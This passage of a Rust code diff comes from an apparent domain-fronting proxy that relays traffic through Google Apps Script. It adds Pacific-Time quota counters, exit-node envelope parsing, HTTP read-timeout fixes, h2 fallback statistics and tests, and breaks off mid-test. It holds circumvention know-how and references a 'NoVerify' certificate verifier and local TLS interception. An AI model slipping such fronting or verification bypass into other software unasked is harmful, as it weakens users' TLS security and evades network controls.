+    // assuming PST (UTC-8), then ask whether that date is inside the
+    // DST window and apply the real offset. Being up to an hour off in
+    // the provisional date is harmless because DST never starts within
+    // the first hour after midnight PST nor ends within the first hour
+    // after midnight PDT.
+    let (year, month, day) = unix_to_ymd_utc(utc_secs.saturating_sub(8 * HOUR));
+    let hours_behind_utc = match pacific_is_dst(year, month, day) {
+        true => 7,
+        false => 8,
+    };
+    // Saturates at 0 for timestamps in the first hours after the epoch.
+    utc_secs.saturating_sub(hours_behind_utc * HOUR)
+}
+
+/// Reports whether Pacific Time is on daylight saving for the given
+/// calendar date (year, month=1..12, day=1..31). The US window runs
+/// from the 2nd Sunday of March through the 1st Sunday of November.
+/// The 02:00-local switch-over is rounded to whole days, which is
+/// precise enough for a daily-quota countdown.
+fn pacific_is_dst(year: i64, month: u32, day: u32) -> bool {
+    match month {
+        // April through October sit wholly inside the DST window,
+        // whatever the day.
+        4..=10 => true,
+        // March: DST applies from the 2nd Sunday onwards (the start
+        // day itself counts as DST).
+        3 => day >= nth_sunday_of_month(year, 3, 2),
+        // November: DST applies only before the 1st Sunday (the end
+        // day itself counts as standard time).
+        11 => day < nth_sunday_of_month(year, 11, 1),
+        // January, February, December and any out-of-range month
+        // value: standard time.
+        _ => false,
+    }
+}
+
+/// Day-of-month of the `nth` (1-indexed) Sunday in (year, month).
+/// Sakamoto's method gives the weekday of the 1st; the target Sunday
+/// follows by offset. Arithmetic only, apart from the month offsets.
+fn nth_sunday_of_month(year: i64, month: u32, nth: u32) -> u32 {
+    // Sakamoto month offsets; the weekday they produce uses 0 = Sunday.
+    const MONTH_OFFSETS: [i64; 12] = [0, 3, 2, 5, 0, 3, 5, 1, 4, 6, 2, 4];
+    let offset = MONTH_OFFSETS[(i64::from(month) - 1) as usize];
+    // January and February are reckoned as part of the previous year.
+    let y = year - i64::from(month < 3);
+    let weekday_of_first = (y + y / 4 - y / 100 + y / 400 + offset + 1).rem_euclid(7) as u32;
+    // 1 + days until Sunday; `% 7` maps "the 1st is a Sunday" to +0.
+    (1 + (7 - weekday_of_first) % 7) + (nth - 1) * 7
+}
+
 /// Convert a Unix timestamp (seconds since 1970-01-01 UTC) to a
 /// (year, month, day) tuple, UTC. Standalone so we can stay
 /// std-only — no chrono/time/jiff dependency pulled for one caller.
@@ -1563,6 +3955,117 @@ fn unix_to_ymd_utc(secs: u64) -> (i64, u32, u32) {
     (y, m as u32, d as u32)
 }
 
+/// Parse the exit-node JSON envelope back into a raw HTTP/1.1
+/// response. The envelope shape is:
+///
+/// - On success: `{ "s": <status u16>, "h": { ... }, "b": "<base64>" }`
+/// - On exit-node-side error: `{ "e": "<message>" }` with HTTP 4xx/5xx
+///   from exit-node's own status code (decoded from the outer Apps Script
+///   layer, not the inner field).
+///
+/// We synthesize a complete HTTP/1.1 response from these fields so the
+/// MITM TLS write-back path sees the same shape it gets from the regular
+/// Apps Script relay (status line + headers + body).
+fn parse_exit_node_response(body: &[u8]) -> Result<Vec<u8>, FronterError> {
+    let v: Value = serde_json::from_slice(body).map_err(|e| {
+        FronterError::Relay(format!(
+            "exit-node response not valid JSON ({}): {}",
+            e,
+            String::from_utf8_lossy(&body[..body.len().min(200)])
+        ))
+    })?;
+
+    // Surface exit-node's internal errors clearly rather than as a 502
+    // from the outer envelope. The `{e: "..."}` shape is what the exit-node's
+    // script emits on bad PSK, malformed URL, or any caught exception.
+    if let Some(err_msg) = v.get("e").and_then(|x| x.as_str()) {
+        return Err(FronterError::Relay(format!(
+            "exit node refused or errored: {}",
+            err_msg
+        )));
+    }
+
+    // A missing, non-numeric or out-of-range status falls back to 502.
+    // `u16::try_from` replaces the old `as u16` cast, which wrapped
+    // (65736 would have been reported as 200).
+    let status = v.get("s").and_then(|x| x.as_u64());
+    let status = status.and_then(|n| u16::try_from(n).ok()).unwrap_or(502);
+    let body_b64 = v.get("b").and_then(|x| x.as_str()).unwrap_or("");
+    let body_bytes = if body_b64.is_empty() {
+        Vec::new()
+    } else {
+        B64.decode(body_b64).map_err(|e| {
+            FronterError::Relay(format!("exit-node body base64 decode failed: {}", e))
+        })?
+    };
+
+    // Reconstruct headers. Skip hop-by-hop / would-double-up headers
+    // (Content-Length is recomputed below) and drop any header whose
+    // name or value carries CR/LF, which would split the response.
+    const SKIP_RESPONSE_HEADERS: &[&str] = &[
+        "content-length",
+        "transfer-encoding",
+        "connection",
+        "keep-alive",
+    ];
+    let has_line_break = |s: &str| s.bytes().any(|b| matches!(b, b'\r' | b'\n'));
+    let mut out = Vec::with_capacity(body_bytes.len() + 256);
+    let _ = std::io::Write::write_fmt(
+        &mut out,
+        format_args!("HTTP/1.1 {} {}\r\n", status, status_reason(status)),
+    );
+    if let Some(headers_obj) = v.get("h").and_then(|x| x.as_object()) {
+        for (k, v_val) in headers_obj {
+            let lc = k.to_ascii_lowercase();
+            if SKIP_RESPONSE_HEADERS.contains(&lc.as_str()) || has_line_break(lc.as_str()) {
+                continue;
+            }
+            if let Some(val_str) = v_val.as_str().filter(|&s| !has_line_break(s)) {
+                let _ = std::io::Write::write_fmt(
+                    &mut out,
+                    format_args!("{}: {}\r\n", k, val_str),
+                );
+            }
+        }
+    }
+    let _ = std::io::Write::write_fmt(
+        &mut out,
+        format_args!("Content-Length: {}\r\n\r\n", body_bytes.len()),
+    );
+    out.extend_from_slice(&body_bytes);
+    Ok(out)
+}
+
+/// Minimal HTTP status reason-phrase table for synthesizing status
+/// lines in `parse_exit_node_response`. Browsers don't actually parse
+/// the reason phrase (only the status code matters), but a recognizable
+/// string makes log lines readable.
+fn status_reason(status: u16) -> &'static str {
+    match status {
+        200 => "OK",
+        201 => "Created",
+        204 => "No Content",
+        301 => "Moved Permanently",
+        302 => "Found",
+        303 => "See Other",
+        304 => "Not Modified",
+        307 => "Temporary Redirect",
+        308 => "Permanent Redirect",
+        400 => "Bad Request",
+        401 => "Unauthorized",
+        403 => "Forbidden",
+        404 => "Not Found",
+        405 => "Method Not Allowed",
+        408 => "Request Timeout",
+        429 => "Too Many Requests",
+        500 => "Internal Server Error",
+        502 => "Bad Gateway",
+        503 => "Service Unavailable",
+        504 => "Gateway Timeout",
+        _ => "Status",
+    }
+}
+
 fn extract_host(url: &str) -> Option<String> {
     let after_scheme = url.split_once("://").map(|(_, rest)| rest).unwrap_or(url);
     let authority = after_scheme.split('/').next().unwrap_or("");
@@ -1754,14 +4257,50 @@ fn parse_redirect(location: &str) -> (String, Option<String>) {
 
 /// Read a single HTTP/1.1 response from the stream. Keep-alive safe: respects
 /// Content-Length or chunked transfer-encoding.
+///
+/// Uses a 10 s *total* header-read deadline — the historical 10 s value,
+/// kept for most callers (relay path, exit-node, etc.). The deadline is
+/// absolute across all header reads rather than a per-read budget, so a
+/// peer drip-feeding bytes cannot silently extend it. The tunnel batch
+/// path overrides the 10 s value via
+/// `read_http_response_with_header_timeout`, since the configurable
+/// `request_timeout_secs` (default 30 s) is the authoritative cliff
+/// there.
 async fn read_http_response<S>(stream: &mut S) -> Result<(u16, Vec<(String, String)>, Vec<u8>), FronterError>
+where
+    S: tokio::io::AsyncRead + Unpin,
+{
+    read_http_response_with_header_timeout(stream, Duration::from_secs(10)).await
+}
+
+/// `read_http_response` with a caller-supplied header-read timeout. The
+/// timeout applies only to the *initial* header-block read; the body-read
+/// timeouts in this function are deliberately left at their fixed values
+/// because once the response has started flowing, per-chunk stalls are a
+/// separate signal from "Apps Script hasn't started writing yet."
+///
+/// The tunnel batch path passes `DomainFronter::batch_timeout()` so that
+/// `Config::request_timeout_secs` is the *only* knob controlling how long
+/// we wait for an Apps Script edge to start responding — the hardcoded 10 s
+/// inner cliff was firing well before the outer `batch_timeout` in
+/// `tunnel_client::fire_batch` could, masquerading as a 10 s "batch
+/// timeout" in user logs (issue #1088).
+async fn read_http_response_with_header_timeout<S>(
+    stream: &mut S,
+    header_read_timeout: Duration,
+) -> Result<(u16, Vec<(String, String)>, Vec<u8>), FronterError>
 where
     S: tokio::io::AsyncRead + Unpin,
 {
     let mut buf = Vec::with_capacity(8192);
     let mut tmp = [0u8; 8192];
+    // One deadline for the whole header read, not per-iteration. Otherwise
+    // a slow peer drip-feeding one byte just under `header_read_timeout`
+    // keeps this loop alive forever and defeats the outer `batch_timeout`
+    // wiring (the entire point of #1088's fix).
+    let deadline = tokio::time::Instant::now() + header_read_timeout;
     let header_end = loop {
-        let n = timeout(Duration::from_secs(10), stream.read(&mut tmp)).await
+        let n = tokio::time::timeout_at(deadline, stream.read(&mut tmp)).await
             .map_err(|_| FronterError::Timeout)??;
         if n == 0 {
             return Err(FronterError::BadResponse("connection closed before headers".into()));
@@ -1801,8 +4340,27 @@ where
         while body.len() < cl {
             let need = cl - body.len();
             let want = need.min(tmp.len());
-            let n = timeout(Duration::from_secs(20), stream.read(&mut tmp[..want])).await
-                .map_err(|_| FronterError::Timeout)??;
+            // Handle ungraceful TLS close-without-close_notify (rustls
+            // surfaces this as `io::ErrorKind::UnexpectedEof`). Some
+            // origins — notably exit-node path through Apps
+            // Script (#585, v1.9.4) and certain Apps Script `Connection:
+            // close` responses — terminate the underlying TCP without
+            // sending the TLS close_notify alert first. Treat that the
+            // same as a clean `n == 0`: if we already have the full body
+            // declared by Content-Length, the response *is* complete.
+            // Only propagate the error if Content-Length couldn't be
+            // satisfied (real truncation, not a polite-protocol violation).
+            let read_res = timeout(
+                Duration::from_secs(20),
+                stream.read(&mut tmp[..want]),
+            )
+            .await
+            .map_err(|_| FronterError::Timeout)?;
+            let n = match read_res {
+                Ok(n) => n,
+                Err(e) if e.kind() == std::io::ErrorKind::UnexpectedEof => 0,
+                Err(e) => return Err(e.into()),
+            };
             if n == 0 {
                 return Err(FronterError::BadResponse(
                     "connection closed before full response body".into(),
@@ -1811,11 +4369,17 @@ where
             body.extend_from_slice(&tmp[..n]);
         }
     } else {
-        // No framing — read until short timeout.
+        // No framing — read until short timeout, EOF, or ungraceful
+        // TLS close (UnexpectedEof). Each is treated as "we got what
+        // the peer wanted to send"; the response we already have is
+        // returned to the caller. UnexpectedEof here is the most common
+        // case for `Connection: close` responses from servers that
+        // don't bother with TLS close_notify (#585).
         loop {
             match timeout(Duration::from_secs(2), stream.read(&mut tmp)).await {
                 Ok(Ok(0)) => break,
                 Ok(Ok(n)) => body.extend_from_slice(&tmp[..n]),
+                Ok(Err(e)) if e.kind() == std::io::ErrorKind::UnexpectedEof => break,
                 Ok(Err(e)) => return Err(e.into()),
                 Err(_) => break,
             }
@@ -1861,8 +4425,18 @@ where
             }
         }
         while buf.len() < size + 2 {
-            let n = timeout(Duration::from_secs(20), stream.read(&mut tmp)).await
-                .map_err(|_| FronterError::Timeout)??;
+            // UnexpectedEof tolerance — see read_http_response for
+            // rationale. Treated as `n == 0`; if we haven't accumulated
+            // the full chunk yet, that's still a real truncation and
+            // we return BadResponse below.
+            let read_res = timeout(Duration::from_secs(20), stream.read(&mut tmp))
+                .await
+                .map_err(|_| FronterError::Timeout)?;
+            let n = match read_res {
+                Ok(n) => n,
+                Err(e) if e.kind() == std::io::ErrorKind::UnexpectedEof => 0,
+                Err(e) => return Err(e.into()),
+            };
             if n == 0 {
                 return Err(FronterError::BadResponse(
                     "connection closed mid-chunked response".into(),
@@ -1926,6 +4500,44 @@ fn parse_status_line(line: &str) -> Result<u16, FronterError> {
     code.parse::<u16>().map_err(|_| FronterError::BadResponse(format!("bad status code: {}", code)))
 }
 
+/// Returns `true` if the HTTP method may be fanned out across multiple
+/// Apps Script deployments: GET, HEAD or OPTIONS (case-insensitive), all
+/// "safe" (read-only) methods per RFC 9110 §9.2.1. `do_relay_with_retry`
+/// uses this to gate the `parallel_relay` fan-out so that POST / PUT /
+/// PATCH / DELETE don't double-fire at the destination — Apps Script
+/// `UrlFetchApp.fetch()` can't be cancelled mid-request from our side, so
+/// every parallel attempt completes server-side. See #743.
+fn is_method_safe_for_fanout(method: &str) -> bool {
+    const SAFE: [&str; 3] = ["GET", "HEAD", "OPTIONS"];
+    SAFE.iter().any(|m| method.eq_ignore_ascii_case(m))
+}
+
+/// Tells whether a status seen on the h2 path means "this edge won't
+/// accept your fronted h2 request, but might accept the same request
+/// over h1". A `true` result triggers the automatic sticky-disable of
+/// the h2 fast path plus the h1 fallback.
+///
+/// Only 421 (Misdirected Request) qualifies. It is the spec signal
+/// (RFC 7540 §9.1.2; now RFC 9110 §15.5.20) for "this connection's
+/// authority does not fit the request URI". With domain fronting that
+/// means the edge enforced "TLS SNI must match :authority" — true on
+/// h2 (the server sees both pseudo-headers in cleartext) but
+/// historically lenient on h1 (the encrypted Host header is what the
+/// bypass relies on). Classifying 421 as h2-fallback rather than an
+/// "Apps Script error" keeps h2 default-on from breaking h1
+/// deployments that used to work.
+///
+/// Other edge-level rejects (403, etc.) stay ambiguous — they could be
+/// a real Apps Script geoblock or a real upstream answer — so they are
+/// not blanket-treated as refusals.
+///
+/// The h2 layer treats 421 as a "request not sent upstream" outcome
+/// (rejected before reaching Apps Script), so retrying over h1 cannot
+/// duplicate the request.
+fn is_h2_fronting_refusal_status(status: u16) -> bool {
+    matches!(status, 421)
+}
+
 /// Parse the JSON envelope from Apps Script and build a raw HTTP response.
 fn parse_relay_json(body: &[u8]) -> Result<Vec<u8>, FronterError> {
     let text = std::str::from_utf8(body)
@@ -1938,14 +4550,38 @@ fn parse_relay_json(body: &[u8]) -> Result<Vec<u8>, FronterError> {
     let data: RelayResponse = match serde_json::from_str(text) {
         Ok(v) => v,
         Err(_) => {
-            // Apps Script may prepend HTML fallback; try to extract first {...}
-            let start = text.find('{').ok_or_else(|| {
-                FronterError::BadResponse(format!("no json in: {}", &text[..text.len().min(200)]))
-            })?;
-            let end = text.rfind('}').ok_or_else(|| {
-                FronterError::BadResponse(format!("no json end in: {}", &text[..text.len().min(200)]))
-            })?;
-            serde_json::from_str(&text[start..=end])?
+            // Some deployments (legacy Code.gs that used HtmlService for
+            // _json, or our own doGet hit accidentally via a redirect
+            // chain) wrap the JSON inside the goog.script sandbox iframe
+            // as `goog.script.init("\x7b...userHtml...\x7d", "", undefined)`.
+            // Try that unwrap first — if it succeeds, the inner userHtml
+            // *is* our JSON. Mirrors upstream's Python client extractor.
+            if let Some(unwrapped) = extract_apps_script_user_html(text) {
+                if let Ok(v) = serde_json::from_str(&unwrapped) {
+                    v
+                } else {
+                    return Err(FronterError::BadResponse(format!(
+                        "no json in apps_script user_html: {}",
+                        &unwrapped[..unwrapped.len().min(200)]
+                    )));
+                }
+            } else {
+                // Last resort: extract first { ... last }, in case Apps
+                // Script prepended HTML preamble before the raw JSON.
+                let start = text.find('{').ok_or_else(|| {
+                    FronterError::BadResponse(format!(
+                        "no json in: {}",
+                        &text[..text.len().min(200)]
+                    ))
+                })?;
+                let end = text.rfind('}').ok_or_else(|| {
+                    FronterError::BadResponse(format!(
+                        "no json end in: {}",
+                        &text[..text.len().min(200)]
+                    ))
+                })?;
+                serde_json::from_str(&text[start..=end])?
+            }
         }
     };
 
@@ -2001,6 +4637,98 @@ fn parse_relay_json(body: &[u8]) -> Result<Vec<u8>, FronterError> {
     Ok(out)
 }
 
+/// Pulls our JSON payload out of the `goog.script.init` sandbox iframe
+/// page that HtmlService web-app responses are wrapped in. The page
+/// looks roughly like:
+///
+/// ```text
+/// <html>...
+/// goog.script.init("\x7b\x22userHtml\x22:\x22{...}\x22,...\x7d", "", undefined);
+/// ...
+/// ```
+///
+/// The first argument is a JS string literal holding an escaped JSON
+/// object; its `userHtml` string field carries the body we want. Any
+/// step that fails (marker missing, bad escape, outer text not JSON,
+/// no string `userHtml`) yields `None` so the caller can fall back to
+/// the brace-scan path.
+/// Mirrors `_extract_apps_script_user_html` in upstream Python client.
+fn extract_apps_script_user_html(text: &str) -> Option<String> {
+    // Opening of the call up to and including the quote that starts
+    // the first argument.
+    const OPEN: &str = "goog.script.init(\"";
+    // Closing quote of the first argument followed by the two trailing
+    // positional arguments (empty string, `undefined`).
+    const CLOSE: &str = "\", \"\", undefined";
+
+    // Keep what sits between the first OPEN and the first CLOSE after it.
+    let (_, after_open) = text.split_once(OPEN)?;
+    let (encoded, _) = after_open.split_once(CLOSE)?;
+
+    // Undo the JS string-literal escapes to recover the outer JSON text.
+    let decoded = decode_js_string_escapes(encoded)?;
+
+    // Outer JSON — typically `{"userHtml":"<our JSON>", ...}`.
+    let outer: Value = serde_json::from_str(&decoded).ok()?;
+    outer.get("userHtml")?.as_str().map(str::to_owned)
+}
+
+/// Minimal JS string-literal escape decoder for `\xNN`, `\uNNNN`, and
+/// the standard backslash forms (`\\`, `\"`, `\'`, `\/`, `\n`, `\r`,
+/// `\t`, `\b`, `\f`). Used to unwrap the `goog.script.init("...")`
+/// parameter.
+///
+/// Text between escapes is copied through as whole UTF-8 slices, so
+/// non-ASCII characters (e.g. localized Apps Script error messages)
+/// survive intact instead of being split into one `char` per byte.
+///
+/// Returns `None` on malformed input: a trailing lone backslash, an
+/// unknown escape letter, a truncated or non-hex `\x`/`\u` payload, or a
+/// `\u` value that is not a Unicode scalar value (lone surrogates;
+/// surrogate pairs are not combined).
+fn decode_js_string_escapes(s: &str) -> Option<String> {
+    /// Parse exactly `len` hex digits starting at byte `at` into a `char`.
+    /// `from_str_radix` alone would also accept a leading `+`, which is
+    /// not valid inside a JS escape, so the digits are checked first.
+    fn hex_char(s: &str, at: usize, len: usize) -> Option<char> {
+        let digits = s.get(at..at + len)?;
+        if !digits.bytes().all(|b| b.is_ascii_hexdigit()) {
+            return None;
+        }
+        char::from_u32(u32::from_str_radix(digits, 16).ok()?)
+    }
+
+    let mut out = String::with_capacity(s.len());
+    let mut rest = s;
+    while let Some(pos) = rest.find('\\') {
+        // Everything before the backslash is literal text; `pos` is a
+        // char boundary because `\` is ASCII.
+        out.push_str(&rest[..pos]);
+        let esc = *rest.as_bytes().get(pos + 1)?;
+        // `consumed` counts the backslash, the escape letter, and any
+        // hex payload.
+        let (ch, consumed) = match esc {
+            b'x' => (hex_char(rest, pos + 2, 2)?, 4),
+            b'u' => (hex_char(rest, pos + 2, 4)?, 6),
+            b'\\' => ('\\', 2),
+            b'"' => ('"', 2),
+            b'\'' => ('\'', 2),
+            b'/' => ('/', 2),
+            b'n' => ('\n', 2),
+            b'r' => ('\r', 2),
+            b't' => ('\t', 2),
+            b'b' => ('\x08', 2),
+            b'f' => ('\x0c', 2),
+            _ => return None,
+        };
+        out.push(ch);
+        rest = &rest[pos + consumed..];
+    }
+    // No backslash left: the remaining tail is literal text.
+    out.push_str(rest);
+    Some(out)
+}
+
 #[derive(Debug, Clone)]
 pub struct StatsSnapshot {
     pub relay_calls: u64,
@@ -2012,17 +4740,36 @@ pub struct StatsSnapshot {
     pub cache_bytes: usize,
     pub blacklisted_scripts: usize,
     pub total_scripts: usize,
-    /// Relay calls attributed to the current UTC day. Resets at 00:00 UTC.
-    /// This is what-this-process-has-done today, not the Google-side bucket.
+    /// Relay calls attributed to the current Pacific Time day. Resets
+    /// at 00:00 PT (midnight Pacific) — matches Apps Script's actual
+    /// quota reset cadence (#230, #362). This is what-this-process-
+    /// has-done today, not the Google-side bucket.
     pub today_calls: u64,
-    /// Response bytes from relay calls attributed to the current UTC day.
+    /// Response bytes from relay calls attributed to the current PT day.
     pub today_bytes: u64,
-    /// "YYYY-MM-DD" of the day `today_calls` / `today_bytes` refer to.
-    /// Useful for cross-referencing against Google's dashboard.
+    /// "YYYY-MM-DD" of the PT day `today_calls` / `today_bytes` refer
+    /// to. Useful for cross-referencing against Google's dashboard,
+    /// which is also PT-aligned.
     pub today_key: String,
-    /// Seconds until the next 00:00 UTC rollover. Convenient for the UI
+    /// Seconds until the next 00:00 PT rollover. Convenient for the UI
     /// to render "Resets in Xh Ym" without importing time libraries.
     pub today_reset_secs: u64,
+    /// Calls served by the HTTP/2 multiplexed transport, across all
+    /// entry points (Apps-Script direct, exit-node outer call,
+    /// full-mode tunnel single op, full-mode tunnel batch).
+    ///
+    /// Not comparable to `relay_calls` — that counter only sees the
+    /// Apps-Script-direct path. To gauge h2 health, compute
+    /// `h2_calls / (h2_calls + h2_fallbacks)`.
+    pub h2_calls: u64,
+    /// Calls that attempted h2 but had to fall back to h1 (per-call
+    /// failures, open timeout, backoff, sticky ALPN refusal). Same
+    /// all-entry-points scope as `h2_calls`.
+    pub h2_fallbacks: u64,
+    /// True when h2 is permanently off for this fronter (config kill
+    /// switch set, or peer refused h2 during ALPN). All traffic on the
+    /// h1 path.
+    pub h2_disabled: bool,
 }
 
 impl StatsSnapshot {
@@ -2036,8 +4783,27 @@ impl StatsSnapshot {
     }
 
     pub fn fmt_line(&self) -> String {
+        // h2 segment is the success ratio across all transports
+        // (h2_calls + h2_fallbacks). Showing "X/Y" against relay_calls
+        // would mislead — relay_calls only counts the Apps-Script
+        // direct path, while h2_calls also includes exit-node and
+        // tunnel paths that bypass relay_uncoalesced.
+        let h2_seg = if self.h2_disabled {
+            " h2=off".to_string()
+        } else {
+            let total = self.h2_calls + self.h2_fallbacks;
+            if total == 0 {
+                String::new()
+            } else {
+                let pct = (self.h2_calls as f64 / total as f64) * 100.0;
+                format!(
+                    " h2-success={}/{} ({:.0}%)",
+                    self.h2_calls, total, pct
+                )
+            }
+        };
         format!(
-            "stats: relay={} ({}KB) failures={} coalesced={} cache={}/{} ({:.0}% hit, {}KB) scripts={}/{} active",
+            "stats: relay={} ({}KB) failures={} coalesced={} cache={}/{} ({:.0}% hit, {}KB) scripts={}/{} active{}",
             self.relay_calls,
             self.bytes_relayed / 1024,
             self.relay_failures,
@@ -2048,6 +4814,7 @@ impl StatsSnapshot {
             self.cache_bytes / 1024,
             self.total_scripts - self.blacklisted_scripts,
             self.total_scripts,
+            h2_seg,
         )
     }
 
@@ -2060,7 +4827,7 @@ impl StatsSnapshot {
             s.replace('\\', "\\\\").replace('"', "\\\"")
         }
         format!(
-            r#"{{"relay_calls":{},"relay_failures":{},"coalesced":{},"bytes_relayed":{},"cache_hits":{},"cache_misses":{},"cache_bytes":{},"blacklisted_scripts":{},"total_scripts":{},"today_calls":{},"today_bytes":{},"today_key":"{}","today_reset_secs":{}}}"#,
+            r#"{{"relay_calls":{},"relay_failures":{},"coalesced":{},"bytes_relayed":{},"cache_hits":{},"cache_misses":{},"cache_bytes":{},"blacklisted_scripts":{},"total_scripts":{},"today_calls":{},"today_bytes":{},"today_key":"{}","today_reset_secs":{},"h2_calls":{},"h2_fallbacks":{},"h2_disabled":{}}}"#,
             self.relay_calls,
             self.relay_failures,
             self.coalesced,
@@ -2074,6 +4841,9 @@ impl StatsSnapshot {
             self.today_bytes,
             esc(&self.today_key),
             self.today_reset_secs,
+            self.h2_calls,
+            self.h2_fallbacks,
+            self.h2_disabled,
         )
     }
 }
@@ -2092,6 +4862,11 @@ fn looks_like_quota_error(msg: &str) -> bool {
         || lower.contains("rate limit")
         || lower.contains("too many times")
         || lower.contains("service invoked")
+        || lower.contains("bandwidth")
+        || lower.contains("bandbreitenkontingent")
+        || lower.contains("datenübertragungsrate")
+        || lower.contains("transfer rate")
+        || lower.contains("limit exceeded")
 }
 
 fn mask_script_id(id: &str) -> String {
@@ -2210,7 +4985,191 @@ impl ServerCertVerifier for NoVerify {
 #[cfg(test)]
 mod tests {
     use super::*;
-    use tokio::io::{duplex, AsyncWriteExt};
+    use std::pin::Pin;
+    use std::task::{Context, Poll};
+    use tokio::io::{duplex, AsyncRead, AsyncWriteExt, ReadBuf};
+
+    // Fake stream that models an ungraceful TLS close: it hands out a
+    // fixed byte prefix, then every later read fails with
+    // io::ErrorKind::UnexpectedEof — the error rustls reports when the
+    // peer drops TCP without a TLS close_notify alert (#585).
+    struct UnexpectedEofAfter {
+        bytes: Vec<u8>,
+        position: usize,
+    }
+
+    impl AsyncRead for UnexpectedEofAfter {
+        fn poll_read(
+            self: Pin<&mut Self>,
+            _cx: &mut Context<'_>,
+            buf: &mut ReadBuf<'_>,
+        ) -> Poll<std::io::Result<()>> {
+            let this = self.get_mut();
+            let pending = &this.bytes[this.position.min(this.bytes.len())..];
+            if pending.is_empty() {
+                let kind = std::io::ErrorKind::UnexpectedEof;
+                let why = "peer closed connection without sending TLS close_notify";
+                return Poll::Ready(Err(std::io::Error::new(kind, why)));
+            }
+            let chunk = &pending[..pending.len().min(buf.remaining())];
+            buf.put_slice(chunk);
+            this.position += chunk.len();
+            Poll::Ready(Ok(()))
+        }
+    }
+
+    #[tokio::test]
+    async fn read_http_response_tolerates_unexpected_eof_with_content_length() {
+        // Regression for #585 (v1.9.4 exit-node bug): the peer sends a
+        // complete Content-Length-framed response and then drops TCP
+        // without a TLS close_notify. Because the declared body length
+        // is already satisfied, the body must be returned rather than
+        // the UnexpectedEof from the read that would follow it.
+        let body = b"{\"ok\":true}";
+        let mut wire = format!(
+            "HTTP/1.1 200 OK\r\nContent-Length: {}\r\nConnection: close\r\n\r\n",
+            body.len()
+        )
+        .into_bytes();
+        wire.extend_from_slice(body);
+        let mut stream = UnexpectedEofAfter {
+            bytes: wire,
+            position: 0,
+        };
+
+        let outcome = read_http_response(&mut stream).await;
+        let (status, _headers, got_body) = outcome.expect("must succeed despite UnexpectedEof");
+        assert_eq!(status, 200);
+        assert_eq!(got_body, body);
+    }
+
+    #[tokio::test]
+    async fn read_http_response_tolerates_unexpected_eof_no_framing() {
+        // #585 again, this time for a response with neither
+        // Content-Length nor Transfer-Encoding. The reader keeps going
+        // until the peer closes, so UnexpectedEof has to end the loop
+        // and hand back the bytes gathered so far instead of failing.
+        let header = b"HTTP/1.1 200 OK\r\nConnection: close\r\n\r\n";
+        let body = b"hello world";
+        let wire = [&header[..], &body[..]].concat();
+        let mut stream = UnexpectedEofAfter {
+            bytes: wire,
+            position: 0,
+        };
+
+        let outcome = read_http_response(&mut stream).await;
+        let (status, _headers, got_body) = outcome.expect("must succeed despite UnexpectedEof");
+
+        assert_eq!(status, 200);
+        assert_eq!(got_body, body);
+    }
+
+    /// Issue #1088. The tunnel batch path passes `batch_timeout` (default
+    /// 30 s, configurable up to 300 s) to `read_http_response_with_header_timeout`
+    /// so Apps Script cold starts in the 8-12 s range no longer trip a
+    /// hardcoded 10 s cliff. A regression that re-introduces the old 10 s
+    /// inner timeout — or that ignores the parameter entirely — would let
+    /// cold-start batches fail in the field while passing every existing
+    /// test. This locks the parameter down: headers arriving at virtual
+    /// T=15 s must succeed when the caller asked for a 30 s budget.
+    #[tokio::test(start_paused = true)]
+    async fn read_http_response_respects_configured_header_timeout() {
+        use tokio::io::AsyncWriteExt;
+
+        let (mut client_side, mut server_side) = tokio::io::duplex(8192);
+        let response = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n";
+
+        tokio::spawn(async move {
+            // Slow Apps Script edge: nothing is written for 15 s. The
+            // clock is virtual (`start_paused`), so the sleep costs no
+            // real time. A 10 s budget would time out; 30 s must not.
+            tokio::time::sleep(Duration::from_secs(15)).await;
+            server_side.write_all(response).await.unwrap();
+        });
+
+        let (status, _, body) = read_http_response_with_header_timeout(
+            &mut client_side,
+            Duration::from_secs(30),
+        )
+        .await
+        .expect("15 s response must succeed under 30 s header-read budget");
+        assert_eq!(status, 200);
+        assert!(body.is_empty());
+    }
+
+    /// The header-read deadline must be *total*, not reset on every read.
+    /// Otherwise a peer that drip-feeds one byte just under the per-read
+    /// timeout keeps the loop alive forever and the outer `batch_timeout`
+    /// wiring — the whole point of #1088's fix — never gets to fire.
+    /// A naive revert to `timeout(d, stream.read(...))` inside the loop
+    /// would reintroduce exactly that, because every individual read
+    /// completes well under `d`. With the `timeout_at(deadline, ...)`
+    /// form the total elapsed time exceeds the deadline and we get
+    /// `FronterError::Timeout`.
+    #[tokio::test(start_paused = true)]
+    async fn read_http_response_header_deadline_is_total_not_per_read() {
+        use tokio::io::AsyncWriteExt;
+
+        let (mut client_side, mut server_side) = tokio::io::duplex(8192);
+        // Header block is 38 bytes; drip-feeding at 3 s/byte takes 114 s
+        // total. Each individual read returns within 3 s — well under
+        // the 10 s budget — so per-read semantics would NOT detect the
+        // stall.
+        let response = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n".to_vec();
+
+        tokio::spawn(async move {
+            for byte in response {
+                tokio::time::sleep(Duration::from_secs(3)).await;
+                server_side.write_all(&[byte]).await.unwrap();
+                server_side.flush().await.unwrap();
+            }
+        });
+
+        let result = read_http_response_with_header_timeout(
+            &mut client_side,
+            Duration::from_secs(10),
+        )
+        .await;
+        assert!(
+            matches!(result, Err(FronterError::Timeout)),
+            "drip-feed slower than the total deadline must time out — \
+             got {:?}",
+            result.map(|(s, _, _)| s)
+        );
+    }
+
+    #[test]
+    fn parse_exit_node_response_unwraps_exit_node_envelope() {
+        // The exit-node path through Apps Script returns the exit node's
+        // JSON envelope as the response body. parse_exit_node_response
+        // must unwrap it back into a raw HTTP/1.1 response so the MITM
+        // TLS write-back path sees the same shape it gets from the
+        // regular Apps Script relay. Purely synchronous: no runtime.
+        let envelope = br#"{"s":200,"h":{"content-type":"application/json","x-cf-cache":"DYNAMIC"},"b":"eyJtZXNzYWdlIjoiaGVsbG8ifQ=="}"#;
+        let raw = parse_exit_node_response(envelope).expect("envelope unwrap should succeed");
+        let raw_str = String::from_utf8_lossy(&raw);
+        assert!(raw_str.starts_with("HTTP/1.1 200 OK\r\n"));
+        assert!(raw_str.contains("content-type: application/json\r\n"));
+        assert!(raw_str.contains("x-cf-cache: DYNAMIC\r\n"));
+        assert!(raw_str.contains("Content-Length: 19\r\n"));
+        // Body is `{"message":"hello"}` (19 bytes; the base64-decoded
+        // contents of the b field).
+        assert!(raw.ends_with(b"{\"message\":\"hello\"}"));
+    }
+
+    #[test]
+    fn parse_exit_node_response_surfaces_explicit_error() {
+        // When the exit node returns `{e: "..."}` instead of the {s,h,b}
